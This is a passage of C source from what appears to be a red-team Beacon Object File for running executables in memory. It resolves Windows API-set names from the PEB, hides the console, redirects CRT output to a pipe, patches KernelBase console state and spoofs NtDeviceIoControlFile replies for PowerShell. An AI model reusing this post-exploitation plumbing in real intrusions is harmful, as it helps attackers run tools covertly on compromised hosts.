#define GET_API_SET_NAMESPACE_ENTRY_DATA_V3(ApiSetNamespace, NamespaceEntry) \
    ((PAPI_SET_VALUE_ARRAY_V3)((ULONG_PTR)(ApiSetNamespace) + \
                                ((PAPI_SET_NAMESPACE_ENTRY_V3)(NamespaceEntry))->DataOffset))

#define GET_API_SET_VALUE_ENTRY_V3(ApiSetNamespace, ResolvedValueArray, Index) \
    ((PAPI_SET_VALUE_ENTRY_V3)(((PAPI_SET_VALUE_ARRAY_V3)(ResolvedValueArray))->Array + \
                                        Index))

#define GET_API_SET_VALUE_ENTRY_NAME_V3(ApiSetNamespace, ApiSetValueEntry) \
    ((WCHAR*)((ULONG_PTR)(ApiSetNamespace) + \
                ((PAPI_SET_VALUE_ENTRY_V3)(ApiSetValueEntry))->NameOffset))

#define GET_API_SET_VALUE_ENTRY_VALUE_V3(ApiSetNamespace, ApiSetValueEntry) \
    ((WCHAR*)((ULONG_PTR)(ApiSetNamespace) + \
                ((PAPI_SET_VALUE_ENTRY_V3)(ApiSetValueEntry))->ValueOffset))

PAPI_SET_VALUE_ENTRY_V3
ApiSetpSearchForApiSetHostV3(
    IN PAPI_SET_VALUE_ARRAY_V3 ApiSetValueArray,
    IN WCHAR *ApiSetNameToResolve,
    IN USHORT ApiSetNameToResolveLength,
    IN PAPI_SET_NAMESPACE_ARRAY_V3 ApiSetNamespace)
{
    LONG Low                                 = 0;
    LONG Middle                              = 0;
    LONG High                                = 0;
    LONG Result                              = 0;
    PAPI_SET_VALUE_ENTRY_V3 ApiSetValueEntry = NULL;

    Low = 1; // skip first entry.
    High = ApiSetValueArray->Count - 1;

    while (High >= Low) {
        Middle = (High + Low) >> 1;

        ApiSetValueEntry = GET_API_SET_VALUE_ENTRY_V3(ApiSetNamespace, ApiSetValueArray, Middle);

        Result = RtlCompareUnicodeStrings(
            ApiSetNameToResolve,
            ApiSetNameToResolveLength,
            GET_API_SET_VALUE_ENTRY_NAME_V3(ApiSetNamespace, ApiSetValueEntry),
            ApiSetValueEntry->NameLength,
            TRUE);
        if (Result < 0) {
            High = Middle - 1;
        } else if (Result > 0) {
            Low = Middle + 1;
        } else {
            return ApiSetValueEntry;
        }
    }

    return NULL;
}

BOOL ApiSetResolveToHostV3(
    IN PAPI_SET_NAMESPACE ApiSetNamespace,
    IN PUNICODE_STRING ApiSetNameToResolve,
    IN PUNICODE_STRING ParentName,
    OUT PUNICODE_STRING Output)
{
    BOOL                        IsResolved             = FALSE;
    LONG                        Low                    = 0;
    LONG                        Middle                 = 0;
    LONG                        High                   = 0;
    LONG                        Result                 = 0;
    PAPI_SET_NAMESPACE_ARRAY_V3 ApiSetNamespaceArray   = NULL;
    PAPI_SET_NAMESPACE_ENTRY_V3 ResolvedNamespaceEntry = NULL;
    PAPI_SET_VALUE_ARRAY_V3     ResolvedValueArray     = NULL;
    PAPI_SET_VALUE_ENTRY_V3     HostLibraryEntry       = NULL;
    UNICODE_STRING              ApiSetNameNoExtString  = { 0 };

    RtlInitEmptyUnicodeString(Output, NULL, 0);

    //
    // Skip the prefix.
    //
    ApiSetNameNoExtString.Length = ApiSetNameToResolve->Length - 8;
    ApiSetNameNoExtString.MaximumLength = ApiSetNameNoExtString.Length;
    ApiSetNameNoExtString.Buffer = RVA2VA(PWCHAR, ApiSetNameToResolve->Buffer, 8);

    //
    // Cut off the '.DLL' extension.
    //
    if (ApiSetNameNoExtString.Length >= sizeof(API_SET_DLL_EXTENSTION) &&
        ApiSetNameNoExtString.Buffer[(ApiSetNameNoExtString.Length -
                                      sizeof(API_SET_DLL_EXTENSTION)) / sizeof(WCHAR)] == L'.') {
        ApiSetNameNoExtString.Length -= sizeof(API_SET_DLL_EXTENSTION);
    }

    ApiSetNamespaceArray = (PAPI_SET_NAMESPACE_ARRAY_V3)ApiSetNamespace;
    ResolvedNamespaceEntry = NULL;

    Low = 0;
    High = (LONG)(ApiSetNamespaceArray->Count - 1);

    while (High >= Low) {
        Middle = (Low + High) >> 1;

        ResolvedNamespaceEntry = GET_API_SET_NAMESPACE_ENTRY_V3(ApiSetNamespace, Middle);

        Result = RtlCompareUnicodeStrings(
            ApiSetNameNoExtString.Buffer,
            ApiSetNameNoExtString.Length / sizeof(WCHAR),
            GET_API_SET_NAMESPACE_ENTRY_NAME_V3(ApiSetNamespace, ResolvedNamespaceEntry),
            ResolvedNamespaceEntry->NameLength / sizeof(WCHAR),
            TRUE);
        if (Result < 0) {
            High = Middle - 1;
        } else if (Result > 0) {
            Low = Middle + 1;
        } else {
            break;
        }
    }

    //
    // If the high index is less than the low index, then a matching namespace
    // entry was not found.
    //
    if (High < Low) {
        goto Exit;
    }

    //
    // Get the namspace value array.
    //
    ResolvedValueArray = GET_API_SET_NAMESPACE_ENTRY_DATA_V3(ApiSetNamespace, ResolvedNamespaceEntry);

    //
    // Look for aliases in hosts libraries if necessary.
    //
    if (ResolvedValueArray->Count > 1 && ParentName) {

        HostLibraryEntry = ApiSetpSearchForApiSetHostV3(
            ResolvedValueArray,
            ParentName->Buffer,
            ParentName->Length / sizeof(WCHAR),
            (PAPI_SET_NAMESPACE_ARRAY_V3)ApiSetNamespace);
    } else {
        HostLibraryEntry = NULL;
    }

    //
    // Default to the first value entry.
    //
    if (!HostLibraryEntry) {
        HostLibraryEntry = GET_API_SET_VALUE_ENTRY_V3(ApiSetNamespace, ResolvedValueArray, 0);
    }

    //
    // Output resolved host library.
    //
    Output->Length = (USHORT)HostLibraryEntry->ValueLength;
    Output->MaximumLength = Output->Length;
    Output->Buffer = GET_API_SET_VALUE_ENTRY_VALUE_V3(ApiSetNamespace, HostLibraryEntry);

    IsResolved = TRUE;

Exit:
    return IsResolved;
}



//
// API Set Schema Version 2
//

#define GET_API_SET_NAMESPACE_ENTRY_V2(ApiSetNamespace, Index) \
    ((PAPI_SET_NAMESPACE_ENTRY_V2)((ULONG_PTR)(ApiSetNamespace) + \
                                    ((PAPI_SET_NAMESPACE_ARRAY_V2)(ApiSetNamespace))->Array + \
                                        Index))

PAPI_SET_VALUE_ENTRY_V2
ApiSetpSearchForApiSetHostV2(
    IN PAPI_SET_VALUE_ARRAY_V2 ApiSetValueArray,
    IN PUNICODE_STRING ApiToResolve,
    IN PAPI_SET_NAMESPACE ApiSetNamespace)
{
    LONG                    Low              = 0;
    LONG                    Middle           = 0;
    LONG                    High             = 0;
    LONG                    Result           = 0;
    UNICODE_STRING          ApiSetHostString = { 0 };
    PAPI_SET_VALUE_ENTRY_V2 ApiSetValueEntry = NULL;

    Low = 1; // skip first entry.
    High = ApiSetValueArray->Count - 1;

    while (High >= Low) {
        Middle = (High + Low) >> 1;

        ApiSetValueEntry = &ApiSetValueArray->Array[Middle];
        ApiSetHostString.Length = (USHORT)ApiSetValueEntry->NameLength;
        ApiSetHostString.MaximumLength = ApiSetHostString.Length;
        ApiSetHostString.Buffer = RVA2VA(PWCHAR, ApiSetNamespace, ApiSetValueEntry->NameOffset);

        Result = RtlCompareUnicodeString(ApiToResolve, &ApiSetHostString, TRUE);

        if (Result < 0) {
            High = Middle - 1;
        } else if (Result > 0) {
            Low = Middle + 1;
        } else {
            return ApiSetValueEntry;
        }
    }

    return NULL;
}

BOOL ApiSetResolveToHostV2(
    IN PAPI_SET_NAMESPACE ApiSetNamespace,
    IN PUNICODE_STRING ApiSetNameToResolve,
    IN PUNICODE_STRING ParentName,
    OUT PUNICODE_STRING Output)
{
    BOOL                        IsResolved            = FALSE;
    LONG                        Low                   = 0;
    LONG                        Middle                = 0;
    LONG                        High                  = 0;
    LONG                        Result                = 0;
    PAPI_SET_NAMESPACE_ARRAY_V2 ApiSetNamespaceArray  = NULL;
    PAPI_SET_NAMESPACE_ENTRY_V2 ApiSetNamespaceEntry  = NULL;
    PAPI_SET_VALUE_ARRAY_V2     ApiSetValueArray      = NULL;
    PAPI_SET_VALUE_ENTRY_V2     HostLibraryEntry      = NULL;
    UNICODE_STRING              ApiSetNamespaceString = { 0 };
    UNICODE_STRING              ApiSetNameNoExtString = { 0 };

    RtlInitEmptyUnicodeString(Output, NULL, 0);

    //
    // Skip the prefix.
    //
    ApiSetNameNoExtString.Length = ApiSetNameToResolve->Length - 8;
    ApiSetNameNoExtString.MaximumLength = ApiSetNameNoExtString.Length;
    ApiSetNameNoExtString.Buffer = RVA2VA(PWCHAR, ApiSetNameToResolve->Buffer, 8);

    //
    // Cut off the '.DLL' extension.
    //
    if (ApiSetNameNoExtString.Length >= sizeof(API_SET_DLL_EXTENSTION) &&
        ApiSetNameNoExtString.Buffer[(ApiSetNameNoExtString.Length -
                                      sizeof(API_SET_DLL_EXTENSTION)) / sizeof(WCHAR)] == L'.') {
        ApiSetNameNoExtString.Length -= sizeof(API_SET_DLL_EXTENSTION);
    }

    ApiSetNamespaceArray = (PAPI_SET_NAMESPACE_ARRAY_V2)ApiSetNamespace;
    ApiSetNamespaceEntry = NULL;

    Low = 0;
    High = (LONG)(ApiSetNamespaceArray->Count - 1);

    while (High >= Low) {
        Middle = (Low + High) >> 1;

        ApiSetNamespaceEntry = GET_API_SET_NAMESPACE_ENTRY_V2(ApiSetNamespace, Middle);
        ApiSetNamespaceString.Length = (USHORT)ApiSetNamespaceEntry->NameLength;
        ApiSetNamespaceString.MaximumLength = ApiSetNamespaceString.Length;
        ApiSetNamespaceString.Buffer = RVA2VA(PWCHAR, ApiSetNamespace, ApiSetNamespaceEntry->NameOffset);

        Result = RtlCompareUnicodeString(&ApiSetNameNoExtString, &ApiSetNamespaceString, TRUE);

        if (Result < 0) {
            High = Middle - 1;
        } else if (Result > 0) {
            Low = Middle + 1;
        } else {
            break;
        }
    }

    //
    // If the high index is less than the low index, then a matching namespace
    // entry was not found.
    //
    if (High < Low) {
        goto Exit;
    }

    //
    // Get the namspace value array.
    //
    ApiSetValueArray = RVA2VA(PAPI_SET_VALUE_ARRAY_V2, ApiSetNamespace, ApiSetNamespaceEntry->DataOffset);

    //
    // Look for aliases in hosts libraries if necessary.
    //
    if (ApiSetValueArray->Count > 1 && ParentName) {

        HostLibraryEntry = ApiSetpSearchForApiSetHostV2(
            ApiSetValueArray,
            ParentName,
            ApiSetNamespace);
    } else {
        HostLibraryEntry = NULL;
    }

    //
    // Default to the first value entry.
    //
    if (!HostLibraryEntry) {
        HostLibraryEntry = ApiSetValueArray->Array;
    }

    //
    // Output resolved host library.
    //
    Output->Length = (USHORT)HostLibraryEntry->ValueLength;
    Output->MaximumLength = Output->Length;
    Output->Buffer = RVA2VA(PWCHAR, ApiSetNamespace, HostLibraryEntry->ValueOffset);

    IsResolved = TRUE;

Exit:
    return IsResolved;
}

BOOL ApiSetpResolve(
    IN PUNICODE_STRING Name,
    IN PUNICODE_STRING BaseName,
    OUT PUNICODE_STRING ResolvedName)
{
    PPEB2              peb       = NULL;
    BOOL               Resolved  = FALSE;
    PAPI_SET_NAMESPACE ApiSetMap = NULL;

    peb = (PPEB2)READ_MEMLOC(PEB_OFFSET);
    ApiSetMap = peb->ApiSetMap;

    switch (ApiSetMap->Version) {

        //
        // API set schema version 2
        //
    case API_SET_SCHEMA_VERSION_V2:
        Resolved = ApiSetResolveToHostV2(ApiSetMap, Name, BaseName, ResolvedName);
        break;

        //
        // API set schema version 3
        //
    case API_SET_SCHEMA_VERSION_V3:
        Resolved = ApiSetResolveToHostV3(ApiSetMap, Name, BaseName, ResolvedName);
        break;

        //
        // API set schema version 4
        //
    case API_SET_SCHEMA_VERSION_V4:
        Resolved = ApiSetResolveToHostV4(ApiSetMap, Name, BaseName, ResolvedName);
        break;

        //
        // API set schema version 6
        //
    case API_SET_SCHEMA_VERSION_V6:
        Resolved = ApiSetResolveToHostV6(ApiSetMap, Name, BaseName, ResolvedName);
        break;

    default:
        DPRINT_ERR("API set version not supported: %d", ApiSetMap->Version);
        return FALSE;
    }

    if (!Resolved)
    {
        DPRINT_ERR("Failed to resolve API Set: %ls", Name->Buffer);
    }

    return Resolved;
}

BOOL is_api_set(
    IN PCHAR dll_name)
{
    if (!strncmp(dll_name, "api-", 4) || !strncmp(dll_name, "ext-", 4))
        return TRUE;
    return FALSE;
}

PCHAR api_set_resolve(
    IN PCHAR dll_name)
{
    BOOL           success        = FALSE;
    UNICODE_STRING api_to_resolve = { 0 };
    UNICODE_STRING uresolved      = { 0 };
    PWCHAR         dll_wname      = NULL;
    PCHAR          resolved       = NULL;

    if (!is_api_set(dll_name))
    {
        resolved = intAlloc(sizeof(CHAR) * MAX_PATH);
        StringCopyA(resolved, dll_name);
        return resolved;
    }

    dll_wname = intAlloc(sizeof(WCHAR) * MAX_PATH);
    CharStringToWCharString(dll_wname, dll_name, MAX_PATH);
    myRtlInitUnicodeString(&api_to_resolve, dll_wname);

    success = ApiSetpResolve(
        &api_to_resolve,
        NULL,
        &uresolved);

    intFree(dll_wname);

    if (!success)
        return NULL;

    resolved = intAlloc(sizeof(CHAR) * MAX_PATH);
    WCharStringToCharString(resolved, uresolved.Buffer, uresolved.MaximumLength / 2);
    //DPRINT("api set resolved %s -> %s", dll_name, resolved);

    return resolved;
}


================================================
FILE: Execution-BOF/No-Consolation/source/console.c
================================================

#include "console.h"

/*
 * This is simply in case the operator 100% needs a real console for whatever reason
 */
BOOL allocate_console(
    IN PLOADED_PE_INFO peinfo)
{
    if (!peinfo->alloc_console)
        return TRUE;

    DPRINT("allocate_console");

    /*
     * if a console is already allocated, there is no need to allocate one
     */
    if (get_console_handle())
    {
        DPRINT("A console is already allocated, skipping")
        return TRUE;
    }

    BOOL ( WINAPI *AllocConsole ) ( VOID )     = xGetProcAddress(xGetLibAddress("kernel32", TRUE, NULL), "AllocConsole", 0);
    HWND ( WINAPI *GetConsoleWindow ) ( VOID ) = xGetProcAddress(xGetLibAddress("kernel32", TRUE, NULL), "GetConsoleWindow", 0);
    BOOL ( WINAPI *ShowWindow ) ( HWND, int )  = xGetProcAddress(xGetLibAddress("user32", TRUE, NULL),   "ShowWindow", 0);

    if (!AllocConsole)
    {
        api_not_found("AllocConsole");
        return FALSE;
    }

    if (!AllocConsole())
    {
        function_failed("AllocConsole");
        //continue anyways...
    }

    if (!ShowWindow)
    {
        api_not_found("ShowWindow");
        return TRUE;
    }

    if (!GetConsoleWindow)
    {
        api_not_found("GetConsoleWindow");
        return TRUE;
    }

    if (!ShowWindow(GetConsoleWindow(), SW_HIDE))
    {
        function_failed("ShowWindow");
        //continue anyways...
    }

    return TRUE;
}

/*
 * for MinGW binaries, replace the _file attribute of stdout and stderr
 * with the file descriptor of the anonymous pipe
 */
BOOL redirect_std_out_err_for_mingw(
    IN PLOADED_PE_INFO peinfo)
{
#ifdef _UCRT
    (void)peinfo;
    return TRUE;
#else

    FILE* file = NULL;

    DPRINT("redirect_std_out_err_for_mingw");

    /*
     * if the PE did not load msvcrt.dll, we can skip this step
     */
    if (!peinfo->loaded_msvcrt)
    {
        DPRINT("PE didn't load msvcrt.dll, skipping");
        return TRUE;
    }

    int   ( WINAPI *msvcrt_open_osfhandle ) ( intptr_t, int ) = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "_open_osfhandle", 0);
    FILE* ( WINAPI *msvcrt__iob_func ) ( VOID )               = xGetProcAddress(xGetLibAddress("msvcrt", TRUE, NULL), "__iob_func", 0);

    if (!msvcrt_open_osfhandle || !msvcrt__iob_func)
    {
        api_not_found("MSVCRT$_open_osfhandle");
        api_not_found("MSVCRT$__iob_func");
        return FALSE;
    }

    if (!peinfo->Handles->fo_msvc)
    {
        // convert the pipe handle into a file descriptor
        peinfo->Handles->fo_msvc = msvcrt_open_osfhandle((intptr_t)peinfo->Handles->hWrite, _O_WRONLY);
        if (peinfo->Handles->fo_msvc == -1)
        {
            peinfo->Handles->fo_msvc = 0;
            function_failed("MSVCRT$_open_osfhandle");
            return FALSE;
        }
    }

    // stdout
    file = &msvcrt__iob_func()[1];

    if (file->_file == 1)
    {
        /*
         * The stdout FILE seems to be initialized
         * modifying it can make the program hang
         */

        DPRINT_ERR("stdout is initialized, skipping");
    }
    else
    {
        // save the original state of stdout
        peinfo->original_msvc_stdout = intAlloc(sizeof(FILE));
        memcpy(peinfo->original_msvc_stdout, file, sizeof(FILE));
        peinfo->msvc_stdout = file;

        // modify stdout
        memset(file, 0, sizeof(FILE));
        file->_flag = _IOWRT | _IONBF;
        file->_file = peinfo->Handles->fo_msvc;

        peinfo->modified_msvc_stdout = TRUE;
    }

    // stderr
    file = &msvcrt__iob_func()[2];

    if (file->_file == 2)
    {
        /*
         * The stderr FILE seems to be initialized
         * modifying it can make the program hang
         */

        DPRINT_ERR("stderr is initialized, skipping");
    }
    else
    {
        // save the original state of stderr
        peinfo->original_msvc_stderr = intAlloc(sizeof(FILE));
        memcpy(peinfo->original_msvc_stderr, file, sizeof(FILE));
        peinfo->msvc_stderr = file;

        // modify stderr
        memset(file, 0, sizeof(FILE));
        file->_flag = _IOWRT | _IONBF;
        file->_file = peinfo->Handles->fo_msvc;

        peinfo->modified_msvc_stderr = TRUE;
    }

    return TRUE;
#endif
}

/*
 * for MSVC binaries, replace the _file attribute of stdout and stderr
 * with the file descriptor of the anonymous pipe
 */
BOOL redirect_std_out_err_for_msvc(
    IN PLOADED_PE_INFO peinfo)
{
    PUCRTBASE_FILE file = NULL;

    DPRINT("redirect_std_out_err_for_msvc");

    /*
     * if the PE did not load ucrtbase.dll, we can skip this step
     */
    if (!peinfo->loaded_ucrtbase)
    {
        DPRINT("PE didn't load ucrtbase.dll, skipping");
        return TRUE;
    }

    int            ( WINAPI *ucrtbase_open_osfhandle ) ( intptr_t, int ) = xGetProcAddress(xGetLibAddress("ucrtbase", TRUE, NULL), "_open_osfhandle", 0);
    PUCRTBASE_FILE ( WINAPI *ucrtbase__acrt_iob_func ) ( int )           = xGetProcAddress(xGetLibAddress("ucrtbase", TRUE, NULL), "__acrt_iob_func", 0);

    if (!ucrtbase_open_osfhandle || !ucrtbase__acrt_iob_func)
    {
        api_not_found("UCRTBASE$_open_osfhandle");
        api_not_found("UCRTBASE$__acrt_iob_func");
        return FALSE;
    }

    if (!peinfo->Handles->fo_ucrtbase)
    {
        // convert the pipe handle into a file descriptor (using the ucrtbase version of _open_osfhandle)
        peinfo->Handles->fo_ucrtbase = ucrtbase_open_osfhandle((intptr_t)peinfo->Handles->hWrite, _O_WRONLY);
        if (peinfo->Handles->fo_ucrtbase == -1)
        {
            peinfo->Handles->fo_ucrtbase = 0;
            function_failed("UCRTBASE$_open_osfhandle");
            return FALSE;
        }
    }

    // stdout
    file = ucrtbase__acrt_iob_func(1);

    if (file->_file == 1)
    {
        /*
         * The stdout FILE seems to be initialized
         * modifying it can make the program hang
         */

        DPRINT_ERR("stdout is initialized, skipping");
    }
    else
    {
        // save the original state of stdout
        peinfo->original_ucrtbase_stdout = intAlloc(sizeof(UCRTBASE_FILE));
        memcpy(peinfo->original_ucrtbase_stdout, file, sizeof(UCRTBASE_FILE));
        peinfo->ucrtbase_stdout = file;

        // modify stdout
        memset(file, 0, sizeof(UCRTBASE_FILE));
        file->_flags = 0x2000 | 0x400 | 0x2;
        file->_file  = peinfo->Handles->fo_ucrtbase;
        file->_lock.LockCount = -1;

        peinfo->modified_ucrtbase_stdout = TRUE;
    }

    // stderr
    file = ucrtbase__acrt_iob_func(2);

    if (file->_file == 2)
    {
        /*
         * The stderr FILE seems to be initialized
         * modifying it can make the program hang
         */

        DPRINT_ERR("stderr is initialized, skipping");
    }
    else
    {
        // save the original state of stderr
        peinfo->original_ucrtbase_stderr = intAlloc(sizeof(UCRTBASE_FILE));
        memcpy(peinfo->original_ucrtbase_stderr, file, sizeof(UCRTBASE_FILE));
        peinfo->ucrtbase_stderr = file;

        // modify stderr
        memset(file, 0, sizeof(UCRTBASE_FILE));
        file->_flags = 0x2000 | 0x400 | 0x2;
        file->_file  = peinfo->Handles->fo_ucrtbase;
        file->_lock.LockCount = -1;

        peinfo->modified_ucrtbase_stderr = TRUE;
    }

    return TRUE;
}

PVOID parse_free_console(
    IN PBYTE Addr)
{
    UINT32 Offset                 = 0;
#ifdef _WIN64
    PVOID  Rip                    = NULL;
#endif
    PVOID  ConsoleConnectionState = NULL;
    PBYTE  bytes_to_match         = (PBYTE)"\x80\x3d";

    if (!Addr)
    {
        api_not_found("FreeConsole");
        return NULL;
    }

    /*
     * KERNELBASE$FreeConsole:
     *  ...
     *  80 3d a2        cmp        byte ptr [rip+0x1992a2], 0x0
     *  92 19 00 00
     */

    if (!find_pattern(Addr, 0x30, bytes_to_match, "xx", (PVOID*)&Addr))
    {
        DPRINT("Pattern not found in FreeConsole");
        return NULL;
    }

#ifdef _WIN64
    // address of the next instruction
    Rip  = RVA2VA(PVOID, Addr, 7);
#endif

    // skip over 0x80 0x3d
    Addr++;
    Addr++;

    // read the offset
    Offset = *((PUINT32)Addr);

#ifdef _WIN64
    // the reference is RIP-releative
    Addr = RVA2VA(PVOID, Rip, Offset);
#else
    Addr = (PVOID)Offset;
#endif

    // we have a reference to IsConnected, get the address of the base structure
    ConsoleConnectionState = CONTAINING_RECORD(Addr, CONSOLE_CONNECTION_STATE, IsConnected);
    DPRINT("ConsoleConnectionState: 0x%p", ConsoleConnectionState);

    return ConsoleConnectionState;
}

PVOID parse_base_get_console_reference(
    IN PBYTE Addr)
{
#ifdef _WIN64
    UINT32 Offset                 = 0;
#endif
    PVOID  Rip                    = NULL;
    PVOID  ConsoleReference       = NULL;
    PVOID  ConsoleConnectionState = NULL;

    if (!Addr)
    {
        api_not_found("BaseGetConsoleReference");
        return NULL;
    }

    HANDLE (WINAPI *BaseGetConsoleReference) (void) = (PVOID)Addr;

#ifdef _WIN64
    /*
     * KERNELBASE$BaseGetConsoleReference:
     *  48 8b 05 f9 94 19 00    mov    rax,QWORD PTR [rip+0x1994f9]
     *  c3                      ret
     */

    // address of the 'ret' instruction
    Rip  = RVA2VA(PVOID, Addr, 7);

    if (*Addr != 0x48)
    {
        DPRINT_ERR("failed to parse BaseGetConsoleReference");
        return NULL;
    }

    Addr++;

    if (*Addr != 0x8b)
    {
        DPRINT_ERR("failed to parse BaseGetConsoleReference");
        return NULL;
    }

    Addr++;

    if (*Addr != 0x05)
    {
        DPRINT_ERR("failed to parse BaseGetConsoleReference");
        return NULL;
    }

    Addr++;

    Offset = *((PUINT32)Addr);

    Addr += sizeof(UINT32);

    if (*Addr != 0xc3)
    {
        DPRINT_ERR("failed to parse BaseGetConsoleReference");
        return NULL;
    }

    // the reference is RIP-releative
    ConsoleReference = RVA2VA(PVOID, Rip, Offset);
#else
    /*
     * KERNELBASE$BaseGetConsoleReference:
     *  101bf7f0 a1 c8 47 1e 10  mov        eax,[DAT_101e47c8]
     *  101bf7f5 c3              ret
     */

    // address of the 'ret' instruction
    Rip  = RVA2VA(PVOID, Addr, 5);

    if (*Addr != 0xa1)
    {
        DPRINT_ERR("failed to parse BaseGetConsoleReference");
        return NULL;
    }

    Addr++;

    if (*(PBYTE)Rip != 0xc3)
    {
        DPRINT_ERR("failed to parse BaseGetConsoleReference");
        return NULL;
    }

    ConsoleReference = (PVOID)*((PUINT32)Addr);
#endif

    // make sure we got the address of the ConsoleReference right
    if (BaseGetConsoleReference() != *(PHANDLE)ConsoleReference)
    {
        DPRINT_ERR("failed to parse BaseGetConsoleReference");
        return NULL;
    }

    // get the base of the struct from the address of the attribute
    ConsoleConnectionState = CONTAINING_RECORD(ConsoleReference, CONSOLE_CONNECTION_STATE, ConsoleReference);
    DPRINT("ConsoleConnectionState: 0x%p", ConsoleConnectionState);

    return ConsoleConnectionState;
}

/*
 * In order to find the address of 'ConsoleConnectionState', we parse BaseGetConsoleReference
 * which is a very short function that references a field in that structure
 */
PVOID get_address_of_console_connection_state(VOID)
{
    PBYTE                 Addr                   = NULL;
    PVOID                 ConsoleConnectionState = NULL;
    PVOID                 KernelBase             = NULL;
    PIMAGE_DOS_HEADER     dos                    = NULL;
    PIMAGE_NT_HEADERS     nt                     = NULL;
    PIMAGE_SECTION_HEADER sh                     = NULL;
    LPSTR                 data                   = NULL;
    PVOID                 DataBase               = NULL;
    UINT32                DataSize               = 0;
    PMEMORY_STRUCTS       mem_structs            = NULL;

    mem_structs = BeaconGetValue(NC_MEM_STRUCTS_KEY);
    if (mem_structs && mem_structs->console_connection_state)
        return mem_structs->console_connection_state;

    /*
     * If exported, we parse kernelbase!BaseGetConsoleReference.
     * If not, we parse kernelbase!FreeConsole which is a bit more complex
     */
    if (!ConsoleConnectionState)
    {
        Addr = xGetProcAddress(xGetLibAddress("KernelBase", TRUE, NULL), "BaseGetConsoleReference", 0);
        ConsoleConnectionState = parse_base_get_console_reference(Addr);
    }

    if (!ConsoleConnectionState)
    {
        Addr = xGetProcAddress(xGetLibAddress("KernelBase", TRUE, NULL), "FreeConsole", 0);
        ConsoleConnectionState = parse_free_console(Addr);
    }

    if (!ConsoleConnectionState)
    {
        DPRINT("Failed to get address of ConsoleConnectionState");
        return NULL;
    }

    /*
     * as a sanity check, we verify that the resulting pointer is on the .data section of KernalBase
     */

    KernelBase = xGetLibAddress("kernelbase", TRUE, NULL);
    if (!KernelBase)
    {
        api_not_found("KernelBase.dll");
        return NULL;
    }

    dos  = (PIMAGE_DOS_HEADER)KernelBase;
    nt   = RVA2VA(PIMAGE_NT_HEADERS, dos, dos->e_lfanew);
    sh   = RVA2VA(PIMAGE_SECTION_HEADER, &nt->OptionalHeader, nt->FileHeader.SizeOfOptionalHeader);
    data = ".data";

    // locate the .data segment
    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++)
    {
        if(*(PDWORD)sh[i].Name == *(PDWORD)data)
        {
            DataBase = RVA2VA(PVOID, KernelBase, sh[i].VirtualAddress);
            DataSize = sh[i].Misc.VirtualSize;
            break;
        }
    }

    if (!DataBase || !DataSize)
    {
        DPRINT_ERR("failed to get range of .data section for KernelBase");
        return NULL;
    }

    if ((ULONG_PTR)DataBase > (ULONG_PTR)ConsoleConnectionState ||
        (ULONG_PTR)DataBase + DataSize < (ULONG_PTR)ConsoleConnectionState)
    {
        DPRINT_ERR("ConsoleConnectionState is not in the .data section");
        return NULL;
    }

    mem_structs->console_connection_state = ConsoleConnectionState;

    return ConsoleConnectionState;
}

/*
 * For cmd, we need to trick BasepCreateProcessParameters into setting
 * the ConsoleHandle for child processes to -1
 * to do this, we can:
 * 1) set our ConsoleReference to -1
 * 2) set our ConsoleReference to NULL and our ConsoleHandle to -1
 * I prefer 1) because it allows us to set the ConsoleHandle to
 * whatever we like, which comes in handy when dealing with PowerShell
 */
BOOL redirect_std_out_err_for_cmd(
    IN PLOADED_PE_INFO peinfo)
{
    PCONSOLE_CONNECTION_STATE ConsoleConnectionState = NULL;

    DPRINT("redirect_std_out_err_for_cmd");

    ConsoleConnectionState = get_address_of_console_connection_state();
    if (!ConsoleConnectionState)
        return FALSE;

    // save the original value of the ConsoleReference
    peinfo->original_console_reference = ConsoleConnectionState->ConsoleReference;
    peinfo->console_reference_addr     = &ConsoleConnectionState->ConsoleReference;

    // set the ConsoleReference to -1
    ConsoleConnectionState->ConsoleReference = (HANDLE)(ULONG_PTR)(-1);
    peinfo->modified_console_reference = TRUE;

    return TRUE;
}

/*
 * when running PowerShell, this function will simulate a successful call to NtDeviceIoControlFile
 */
NTSTATUS NTAPI MyNtDeviceIoControlFile(
    IN HANDLE FileHandle,
    IN HANDLE Event,
    IN PIO_APC_ROUTINE  ApcRoutine,
    IN PVOID ApcContext,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer,
    IN ULONG OutputBufferLength)
{
    PUINT32 ConsoleOutputCP = NULL;
    HANDLE  hConsoleHandle  = NULL;
    LPDWORD lpMode          = NULL;
    LPWSTR  lpConsoleTitle  = NULL;

    if (IoStatusBlock)
    {
        IoStatusBlock->Status = STATUS_SUCCESS;
    }

    PCONSOLE_CP ConsoleCpBuffer = (PCONSOLE_CP)InputBuffer;

    if (IoControlCode == 0x500016 && ConsoleCpBuffer && ConsoleCpBuffer->InputType)
    {
        if (ConsoleCpBuffer->InputType->Id1 == 0x1000000 &&
            ConsoleCpBuffer->InputType->Id2 == 0x8)
        {
            DPRINT("spoofing GetConsoleOutputCP");

            ConsoleOutputCP = ConsoleCpBuffer->OutputPtr;
            *ConsoleOutputCP = 437;

            return STATUS_SUCCESS;
        }
        else if (ConsoleCpBuffer->InputType->Id1 == 0x3000004 &&
                 ConsoleCpBuffer->InputType->Id2 == 0x54)
        {
            DPRINT("spoofing GetCurrentConsoleFontEx");

            return STATUS_SUCCESS;
        }
        else if (ConsoleCpBuffer->InputType->Id1 == 0x1000001 &&
                 ConsoleCpBuffer->InputType->Id2 == 0x4)
        {
            DPRINT("spoofing GetConsoleMode");

            hConsoleHandle = ConsoleCpBuffer->InputValue;
            lpMode         = ConsoleCpBuffer->OutputPtr;

            if (hConsoleHandle == get_std_out_handle())
            {
                /*
                 * calling GetConsoleMode on the fake 'StandardOutput' has to fail
                 */
                *lpMode = 0x0;
                return STATUS_INVALID_HANDLE;
            }
            else if (hConsoleHandle == get_std_in_handle())
            {
                /*
                 * calling GetConsoleMode on 'StandardInput' has to succeed with 0x1f7
                 */
                *lpMode = 0x1f7;
                return STATUS_SUCCESS;
            }
            else
            {
                /*
                 * on the other handles, GetConsoleMode on 'StandardInput' has to succeed with 0x3
                 */
                *lpMode = 0x3;
                return STATUS_SUCCESS;
            }
        }
        else if (ConsoleCpBuffer->InputType->Id1 == 0x2000007 &&
                 ConsoleCpBuffer->InputType->Id2 == 0x5c)
        {
            DPRINT("spoofing GetConsoleScreenBufferInfo");

            return STATUS_SUCCESS;
        }
        else if (ConsoleCpBuffer->InputType->Id1 == 0x1000002 &&
